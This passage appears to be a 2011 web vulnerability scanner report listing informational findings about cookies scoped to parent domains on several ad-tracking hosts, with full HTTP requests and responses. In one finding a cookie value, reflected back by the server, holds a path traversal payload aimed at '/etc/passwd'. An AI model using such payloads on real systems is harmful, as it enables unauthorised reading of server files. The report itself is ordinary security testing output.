Set-Cookie: UID=9cc29993-80.67.74.150-1314836282; expires=Mon, 16-Sep-2013 01:05:33 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

GIF89a.............!.......,...........D..;

11.52. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9QaG90b1NsaWRlU2hvdy9ZQUhPT18xNDNfQjJDX01haWxfRXhwYW5kYWJsZV85NTR4NjAsY3QkMzYsZHQodHkkcm0sY2kocGlkJFlhaG9vLGNpZCR5YWhvb2hvdXNlLGNtcGlkJE1haWwsa2lkJDMwNzgxMDEpLGNkKHRpbWUkMCx0eXBlJGluKSh0aW1lJDAsdHlwZSR0aSkpKQ/2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beap.adx.yahoo.com
Path:   /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9QaG90b1NsaWRlU2hvdy9ZQUhPT18xNDNfQjJDX01haWxfRXhwYW5kYWJsZV85NTR4NjAsY3QkMzYsZHQodHkkcm0sY2kocGlkJFlhaG9vLGNpZCR5YWhvb2hvdXNlLGNtcGlkJE1haWwsa2lkJDMwNzgxMDEpLGNkKHRpbWUkMCx0eXBlJGluKSh0aW1lJDAsdHlwZSR0aSkpKQ/2

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9QaG90b1NsaWRlU2hvdy9ZQUhPT18xNDNfQjJDX01haWxfRXhwYW5kYWJsZV85NTR4NjAsY3QkMzYsZHQodHkkcm0sY2kocGlkJFlhaG9vLGNpZCR5YWhvb2hvdXNlLGNtcGlkJE1haWwsa2lkJDMwNzgxMDEpLGNkKHRpbWUkMCx0eXBlJGluKSh0aW1lJDAsdHlwZSR0aSkpKQ/2 HTTP/1.1
Host: beap.adx.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:10 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=3078081@1@223.1071929@2@223.3078101@1@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.yahoo.com; path=/
Cache-Control: no-cache, private
Accept-Charset: utf-8
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82

<!-- gd1183.adx.ne1.yahoo.com compressed/chunked Sat Sep 17 00:52:10 UTC 2011 -->

11.53. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fUHVzaERvd25fOTU0eDYwX0FkSW50ZXJheCxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkTWFpbCxraWQkMzA5NjA3MiksY2QodGltZSQwLHR5cGUkaW4pKHRpbWUkMCx0eXBlJHRpKSkp/0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beap.adx.yahoo.com
Path:   /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fUHVzaERvd25fOTU0eDYwX0FkSW50ZXJheCxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkTWFpbCxraWQkMzA5NjA3MiksY2QodGltZSQwLHR5cGUkaW4pKHRpbWUkMCx0eXBlJHRpKSkp/0

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fUHVzaERvd25fOTU0eDYwX0FkSW50ZXJheCxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkTWFpbCxraWQkMzA5NjA3MiksY2QodGltZSQwLHR5cGUkaW4pKHRpbWUkMCx0eXBlJHRpKSkp/0 HTTP/1.1
Host: beap.adx.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:53:35 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=3078081@1@223.1071929@2@223.3078101@1@234.3096072@1@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.yahoo.com; path=/
Cache-Control: no-cache, private
Accept-Charset: utf-8
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82

<!-- gd1191.adx.ne1.yahoo.com compressed/chunked Sat Sep 17 00:53:35 UTC 2011 -->

11.54. http://c.statcounter.com/t.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.statcounter.com
Path:   /t.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=5999220&resolution=1920&h=1200&camefrom=http%3A//bgs-soft.com/Products_Sgagent.html&u=http%3A//bgs-soft.com/Products_Sgagent.asp&t=SG.Agent%20Database%20Monitor&java=1&security=6b0a452a&sc_random=0.8136778890620917&sc_snum=1&invisible=1 HTTP/1.1
Host: c.statcounter.com
Proxy-Connection: keep-alive
Referer: http://bgs-soft.com/Products_Sgagent.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0-594085.1315831677.0-1345764.1315835096.1-2145838.1315843624.0-3505602.1315879313.0

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:47:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0-594085.1315831677.0-1345764.1315835096.1-2145838.1315843624.0-3505602.1315879313.0-5999220.1316202439.0; expires=Wed, 14-Sep-2016 19:47:19 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

11.55. http://cdnt.meteorsolutions.com/api/setid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/setid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /api/setid?parent_fbid=&application_id=ee612e29-9b27-4ec8-bbf8-759478dd3755&url_fbid=9Lm6uVSxV_u HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; meteor_server_ee612e29-9b27-4ec8-bbf8-759478dd3755=ee612e29-9b27-4ec8-bbf8-759478dd3755%3C%3E9Lm6uVSxV_u%3C%3E%3C%3Ehttp%253A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253Dhttp%253A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%253Bwi.728%253Bhi.90%253Bai.236941493%253Bct.1%2F01%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u; uid=c5699614-96b6-4b6d-81ac-02170daae0a6

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Date: Sat, 17 Sep 2011 01:39:53 GMT
Etag: "2daeaa8b5f19f0bc209d976c02bd6acb51b00b0a"
P3P: CP="NID DSP ALL COR"
Server: nginx/0.7.65
Set-Cookie: uid=c5699614-96b6-4b6d-81ac-02170daae0a633b7e2913d8ce97675309ce5; Domain=.meteorsolutions.com; expires=Sun, 16 Sep 2012 01:39:53 GMT; Path=/
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........D..;

11.56. http://cdnt.meteorsolutions.com/api/track  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/track

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /api/track?application_id=49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3&url_fbid=1gfCnkBxeSl&parent_fbid=4pj9azku6R1&referrer=http%3A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%3FsendVar%3D20State_49PromoOffer%26source%3DECbc0000000WIP00O%26fbid%3D9Lm6uVSxV_u&location=http%3A%2F%2Fwww.att.com%2Fu-verse%2Favailability%2F%23fbid%3D4pj9azku6R1%3Fsource%3DECbc0000000WIP00O&url_tag=NOMTAG&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3B HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://www.att.com/u-verse/availability/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; meteor_server_ee612e29-9b27-4ec8-bbf8-759478dd3755=ee612e29-9b27-4ec8-bbf8-759478dd3755%3C%3E9Lm6uVSxV_u%3C%3E%3C%3Ehttp%253A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253Dhttp%253A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%253Bwi.728%253Bhi.90%253Bai.236941493%253Bct.1%2F01%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u; uid=c5699614-96b6-4b6d-81ac-02170daae0a6

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 01:52:37 GMT
Etag: "a7c223fab197a8333376f0f20e193cc77bbd9719"
P3P: CP="NID DSP ALL COR"
Server: nginx/0.7.65
Set-Cookie: meteor_server_49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3=49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3%3C%3E1gfCnkBxeSl%3C%3E4pj9azku6R1%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u%3C%3Ehttp%253A%2F%2Fwww.att.com%2Fu-verse%2Favailability%2F%2523fbid%253D4pj9azku6R1%253Fsource%253DECbc0000000WIP00O; Domain=.meteorsolutions.com; expires=Sun, 16 Sep 2012 01:52:37 GMT; Path=/
Set-Cookie: uid=c5699614-96b6-4b6d-81ac-02170daae0a6../../../../../../../../etc/passwd%00c5699614-96b6-4b6d-81ac-02170daae0a6; Domain=.meteorsolutions.com; expires=Sun, 16 Sep 2012 01:52:37 GMT; Path=/
Content-Length: 271
Connection: keep-alive

meteor.json_query_callback({"parent_id": "4pj9azku6R1", "id": "1gfCnkBxeSl", "uid": "c5699614\\x2D96b6\\x2D4b6d\\x2D81ac\\x2D02170daae0a6..\\x2F..\\x2F..\\x2F..\\x2F..\\x2F..\\x2F..\\x2F..\\x2Fetc\\x2
...[SNIP]...

11.57. http://cdnt.meteorsolutions.com/api/track  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/track

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /api/track?application_id=ee612e29-9b27-4ec8-bbf8-759478dd3755&url_fbid=9Lm6uVSxV_u&parent_fbid=&referrer=http%3A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%3FclickData%3DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%3Dhttp%3A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%3Bwi.728%3Bhi.90%3Bai.236941493%3Bct.1%2F01&location=http%3A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%3FsendVar%3D20State_49PromoOffer%26source%3DECbc0000000WIP00O%26fbid%3D9Lm6uVSxV_u&url_tag=NOMTAG&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3B HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; uid=c5699614-96b6-4b6d-81ac-02170daae0a6

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 01:39:25 GMT
Etag: "95f18f7b21ad86257635a566290d793cc8c6a807"
P3P: CP="NID DSP ALL COR"
Server: nginx/0.7.65
Set-Cookie: meteor_server_ee612e29-9b27-4ec8-bbf8-759478dd3755=ee612e29-9b27-4ec8-bbf8-759478dd3755%3C%3E9Lm6uVSxV_u%3C%3E%3C%3Ehttp%253A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253Dhttp%253A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%253Bwi.728%253Bhi.90%253Bai.236941493%253Bct.1%2F01%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u; Domain=.meteorsolutions.com; expires=Sun, 16 Sep 2012 01:39:25 GMT; Path=/
Set-Cookie: uid=c5699614-96b6-4b6d-81ac-02170daae0a6; Domain=.meteorsolutions.com; expires=Sun, 16 Sep 2012 01:39:25 GMT; Path=/
Content-Length: 133
Connection: keep-alive

meteor.json_query_callback({"parent_id": "", "id": "9Lm6uVSxV_u", "uid": "c5699614\\x2D96b6\\x2D4b6d\\x2D81ac\\x2D02170daae0a6"}, 0);

11.58. http://clk.atdmt.com/go/335787632/direct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /go/335787632/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/335787632/direct;wi.728;hi.90;ai.236941493;ct.1/01 HTTP/1.1
Host: clk.atdmt.com
Proxy-Connection: keep-alive
Referer: http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url=http://clk.atdmt.com/go/335787632/direct;wi.728;hi.90;ai.236941493;ct.1/01
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; ach00=eb2a/1c72:ec40/2f33; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=bb2&W=1; NAP=V=1.9&E=b58&C=FWWeOdQjav4-01BzsznEtT1CJyfe8xjK06kPzseNod3oP8GMWbUKsw&W=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=eb2a/1c72:ec40/2f33:233cf/1a43a; expires=Monday, 16-Sep-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2:e1f70b5/1a43a/1403b670/233cf/4e73fa1b; expires=Monday, 16-Sep-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Sat, 17 Sep 2011 01:38:34 GMT
Connection: close


11.59. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-507/d3/jsc/fm.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=collective728x90&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=951:collective728x90;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:933,56,15:951,2,15;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:1:1:1;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMCap=2476560B826,110236|0,1#0,24;expires=Mon, 17 Oct 2011 01:48:55 GMT;path=/;domain=.zedo.com;
ETag: "aa1b9a-8952-4accb58ae5040"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=43
Expires: Sat, 17 Sep 2011 01:49:38 GMT
Date: Sat, 17 Sep 2011 01:48:55 GMT
Content-Length: 4570
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='collective7
...[SNIP]...

11.60. http://d7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=826&g=20&a=0&s=1&l=1&t=e&f=1&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; aps=1; FFcat=933,56,15:951,2,15; FFad=0:0; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,3#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0
If-None-Match: "1b6340a-de5c-4a8e0f9fb9dc0"

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 47
Content-Type: image/gif
Set-Cookie: ZFFAbh=977B826,20|121_977#365;expires=Fri, 16 Dec 2011 01:00:20 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZFFBbh=990B826,20|121_977#0;expires=Sun, 16 Sep 2012 01:00:20 GMT;domain=.zedo.com;path=/;
ETag: "1822b34-de5c-4a8e0f9fb9dc0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=14981
Expires: Sat, 17 Sep 2011 05:10:01 GMT
Date: Sat, 17 Sep 2011 01:00:20 GMT
Connection: close

GIF89a.............!.......,...........D..;



11.61. http://d7.zedo.com/utils/ecSet.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js?v=PI=h484782Za669089Zc826000187%2C826000187Zs173Zt1260Zm68Zb43199&d=.zedo.com HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
